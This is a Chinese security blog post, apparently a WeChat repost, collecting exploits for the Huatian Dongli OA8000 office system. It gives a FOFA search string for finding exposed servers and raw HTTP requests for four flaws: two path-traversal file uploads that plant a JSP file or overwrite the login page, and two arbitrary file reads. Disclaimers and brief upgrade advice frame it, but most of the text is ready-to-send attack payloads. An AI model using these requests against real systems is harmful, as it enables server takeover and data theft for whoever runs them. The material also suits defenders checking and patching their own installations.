SCA御盾实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 产品描述
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。
0x03 fofa语法:
app="华天动力-OA8000"
0x04 漏洞详情
1、htpage-MyHttpServlet-upload
POST /OAapp/MyHttpServlet?username=admin HTTP/1.1Host:User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data; boundary=--------------------------533212604817836013445627Content-Length: 233----------------------------533212604817836013445627Content-Disposition: form-data; name="file";filename="../../../../../../webapps/ROOT/qypzfeaz.jsp%00.jpgqypzfeaz19689315----------------------------533212604817836013445627--GET /qypzfeaz.jsp;.html HTTP/1.1Host:User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: close
2、htpage-readfile
GET /OAapp/jsp/trace/ntkodownload.jsp?filename=../../../../../../../htoa/Tomcat/webapps/OAapp/jsp/trace/ntkodownload.jsp HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: close
3、htpages_upload
一、获取path,获取不到默认取D:/htoa/POST /OAapp/jsp/upload.jsp HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Connection: closeAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: http://116.63.142.107:8081/OAapp/jsp/upload.jspUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data;boundary=----WebKitFormBoundary5Ur8laykKAWws2QOContent-Length: 290------WebKitFormBoundary5Ur8laykKAWws2QOContent-Disposition: form-data;name="file"; filename="xxx.xml"Content-Type: image/pngreal path------WebKitFormBoundary5Ur8laykKAWws2QOContent-Disposition: form-data;name="filename"xxx.png------WebKitFormBoundary5Ur8laykKAWws2QO--二、将第一步获取的路径传到第二步的路径中POST /OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Connection: closeAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer: http://116.63.142.107:8081/OAapp/jsp/upload.jspUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQmContent-Length: 366------WebKitFormBoundaryzRSYXfFlXqk6btQmContent-Disposition: form-data;name="EDITFILE"; filename="xxx.txt"Content-Type: image/pngotmgyrah------WebKitFormBoundaryzRSYXfFlXqk6btQmContent-Disposition: form-data; name="newFileName"D:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp------WebKitFormBoundaryzRSYXfFlXqk6btQm三、文件路径GET /OAapp/htpages/app/module/login/normalLoginPageForOther.jsp HTTP/1.1Host:User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: close
4、htpage-TemplateService-read-file
POST /OAapp/bfapp/buffalo/TemplateService HTTP/1.1Host: baidu.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: text/xmlContent-Length: 99<buffalo-call><method>getHtmlContent</method><string>C://windows/win.ini</string></buffalo-call>
0x05 修复建议
1、升级华天动力oa系统至最新版本
2、官网下载最新安全补丁:http://www.oa8000.com/
漏洞poc+漏洞批量扫描脚本
原文始发于微信公众号(SCA御盾):【漏洞复现】华天动力漏洞集合
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论